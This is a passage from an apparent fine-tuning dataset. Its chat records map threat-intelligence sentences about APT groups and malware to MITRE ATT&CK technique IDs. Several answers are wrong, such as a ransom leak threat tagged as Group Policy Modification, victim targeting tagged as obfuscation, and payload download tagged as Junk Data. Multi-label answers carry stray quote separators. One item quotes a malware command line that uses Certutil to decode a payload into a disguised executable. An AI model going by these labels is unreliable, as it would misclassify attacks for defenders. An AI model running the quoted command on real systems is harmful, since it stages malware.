- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used Python scripts to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has the capability to harvest credentials and passwords from the SAM database."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid"
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification', 'T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloaded and launched code within a SCT file."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can recover hashed passwords."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has installed a Windows service to maintain persistence on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The newer versions of Valak download two payloads in the first stage. The first payload is Valak’s plugin management component (“pluginhost.exe”), and the second is the second stage JavaScript payload of Valak. In earlier versions, Valak did not include the “pluginhost” payload"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This resembled the server-side ASPX payload of the China Chopper webshell documented previously. Uploads to VirusTotal in late August 2018 resembling the same filename, iisstart.aspx, indicate the deployed webshell was likely a version of the China Chopper webshell known to have been used by several Chinese threat actors."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\ v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1074 - Data Staged', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can run a command on another machine using ."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files', 'T1588.001 - Malware', 'T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the “Mark of the Web (MOTW),” which tags files as being downloaded from the internet. It subjects these files to additional security measures by Windows and endpoint security solutions."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear is designed to download an implant from a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain the date and time of a system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, and CVE-2017-0199."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs downloads additional files from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has used basE91 encoding, along with encryption, for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients"
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Palo Alto Networks WildFire observed commands provided by the C2 server for the known Helminth samples. The commands, as seen below, show that the threat actors are attempting to do initial information gathering on the system, including available user accounts, username, computer name, running tasks, services, network services and if remote desktop is enabled."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1049 - System Network Connections Discovery', 'T1590 - Gather Victim Network Information', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Expand can be used to decompress a local or remote CAB file into an executable."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SecurityAssist task is responsible for running the following command line command that uses the Certutil application to decode the base64 encoded data in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:cmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe & SchTasks /Delete /F /TN SecurityAssist The macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript %APPDATA%\\chkSrv.vbs"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used BITSadmin to download and execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses a hidden folder named \".xcassets\" and \".git\" to embed itself in Xcode."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The case we found arrived through a targeted email that contained a document file (in docx format)."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB, HTTP, WCF and RAW Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc. The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified. smbserver.py: A Python implementation of an SMB server"
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, we recently disclosed the activities of one of those teams (dubbed Tsar team) surrounding the use of mobile malware. This team has previously launched campaigns targeting the United States and European intelligence communities, militaries, defense contractors, news organizations, NGOs and multilateral organizations. It has also targeted jihadists and rebels in Chechnya"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.. In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. . In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.. From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has packed malware payloads before delivery to victims."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this blog post, we provide an in-depth analysis of Linux/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years. Linux/Ebury comes in two different shapes: a malicious library and a patch to the main OpenSSH binaries. The malicious library is a modified version of libkeyutils.so. This shared library is loaded by all OpenSSH executables files such as ssh, sshd and ssh-agent. We will describe how the backdoor works and how the OpenSSH functionalities are hooked"
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT3 downloader uses the Windows command \"\"cmd.exe\" /C whoami\" to verify that it is running with the elevated privileges of “System.”"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An backdoor may collect the entire contents of an inserted USB device."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company"
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Patchwork file stealer can run a TaskScheduler DLL to add persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 then created a WMI event subscription in order to execute the backdoor"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the user account doesn’t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin’s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike’s built-in Mimikatz to dump its password hashes"
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses HTTP/HTTPS for command and control communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch uses SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can display the /etc/passwd file on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The stylecs.aspx webshell provides fairly significant functionality, as its developer wrote this webshell in JScript that ultimately runs any supplied JScript code provided to it within the HTTP request.."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack."
- },
- {
- "role": "assistant",
- "content": "T1590.001 - Domain Properties"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has been delivered via malicious links in phishing emails."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STOLEN INFO’ message – bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code obtains the external IP address via an HTTP request using to “http://checkip.dyndns.org/” and uses a regular expression to locate an IP address from the HTTP response"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform screen captures of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi collects text from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SslMM sends the logged-on username to its hard-coded C2."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team used a backdoor to enumerate information about the infected system's operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 has obtained and used a customized version of PsExec, as well as use other tools such as pwdump, SDelete, and Windows Credential Editor."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the scripts are deleted immediately after being executed. TeamTNT also uses the “history -c” command to clear the shell log in every script"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command \"net view /domain\" to a PlugX implant to gather information about remote systems on the network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has been executed through Word documents with malicious embedded macros."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
